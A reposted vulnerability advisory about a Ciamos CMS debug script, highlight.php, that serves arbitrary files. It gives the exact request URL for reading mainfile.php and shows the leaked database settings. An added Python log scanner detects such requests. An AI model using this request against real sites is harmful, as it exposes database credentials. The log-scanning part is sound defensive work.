
[Repost] Ciamos Highlight.php Security Vulnerability

  Source: NT NT ihsteam com

If you have the CIAMOS installation address, you can use the highlight.php hole
and get the database configuration (name, user, password).
Tested in CIAMOS.
-------------------------------------------
Enter this line in your browser address bar:

http://targetsite/ciamosinstalation/class/debug/highlight.php?file=ciamosinstallationpath\mainfile.php&line=151#151

Like this:

http://localhost/ciamos/class/debug/highlight.php?file=c:\phpdev\www\ciamos\mainfile.php&line=151#151

You see this result:

<?php
/**
* Ciamos: Simple + Flexible + Advanced Content Management
* < http://www.ciamos.com >
*/

if ( !defined('CIAMOS_MAINFILE_INCLUDED') ) {
    define('CIAMOS_MAINFILE_INCLUDED', true);

    // Ciamos physical path
    define('SYS_ROOT_PATH', 'c:/phpdev/www/ciamos');

    // Ciamos URL without trailing slash
    define('SYS_ROOT_URL', 'http://localhost/ciamos');

    // Folder name for your modules folder
    define('SYS_MOD_FOLDER', 'modules');

    // Ciamos database layer
    $sysConfig['database'] = 'mysql';

    // Ciamos table prefix
    $sysConfig['prefix'] = 'ciamos';

    // Ciamos database host
    $sysConfig['dbhost'] = 'localhost';

    // Ciamos database user
    $sysConfig['dbuname'] = 'root';

    // Ciamos database password
    $sysConfig['dbpass'] = '';

    // Ciamos database name
    $sysConfig['dbname'] = 'ciamos';

    // Persistent database connection?
    $sysConfig['db_pconnect'] = 0;

    // Ciamos default language
    $sysConfig['default_language'] = 'english';

    /**
    * End edit - do not change anything below this line
    */

    if ( (SYS_ROOT_PATH == '') && (@file_exists('_install/index.php')) ) {
        header('Location: _install/index.php');
        exit();
    }
    include_once(SYS_ROOT_PATH.'/include/common.php');
}
?>

For more information, see:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12

Source Advisory:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=15

Found By NT(IHS)
NT IHSTeam com
Greet To Lord And C0d3r From IHS.
www.IHSTeam.com
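
For administrators checking whether this viewer has already been requested on their own server, the following added example (not part of the original advisory or of Ciamos) scans web access logs for requests to class/debug/highlight.php that carry a file parameter. The log lines are constructed samples in combined log format, and the function name and verdict labels are assumptions of this example.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = r'''
192.0.2.10 - - [01/Jan/2006:10:00:00 +0000] "GET /ciamos/index.php HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jan/2006:10:02:13 +0000] "GET /ciamos/class/debug/highlight.php?file=c:\phpdev\www\ciamos\mainfile.php&line=151 HTTP/1.1" 200 9321
192.0.2.44 - - [01/Jan/2006:10:02:40 +0000] "GET /ciamos/class/debug/highlight.php?file=c%3A%5Cphpdev%5Cwww%5Cciamos%5Cmainfile.php&line=151 HTTP/1.1" 200 9321
192.0.2.51 - - [01/Jan/2006:10:05:02 +0000] "GET /ciamos/class/debug/highlight.php?file=/var/www/ciamos/mainfile.php HTTP/1.1" 404 210
'''

# Captures: client address, request target, HTTP status.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
VIEWER = "/class/debug/highlight.php"  # script path taken from the advisory

def find_highlight_reads(log_text):
    """Return (client, requested_file, status, verdict) for each viewer request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        # The "#151" fragment in the advisory URL never reaches the server or its logs.
        path, _, query = target.partition("?")
        if not unquote(path).lower().endswith(VIEWER):
            continue
        files = parse_qs(query).get("file")  # parse_qs also decodes %xx escapes
        if not files:
            continue
        requested = files[0]
        basename = re.split(r"[\\/]", requested)[-1].lower()
        if status == 200 and basename == "mainfile.php":
            verdict = "config-exposed"  # treat the database credentials as disclosed
        elif status == 200:
            verdict = "file-read"
        else:
            verdict = "probe"
        hits.append((client, requested, status, verdict))
    return hits

if __name__ == "__main__":
    for hit in find_highlight_reads(SAMPLE_LOG):
        print(hit)
```

A config-exposed hit means the database settings in mainfile.php were served to that client, so the credentials should be changed and the class/debug/ directory removed or blocked from web access.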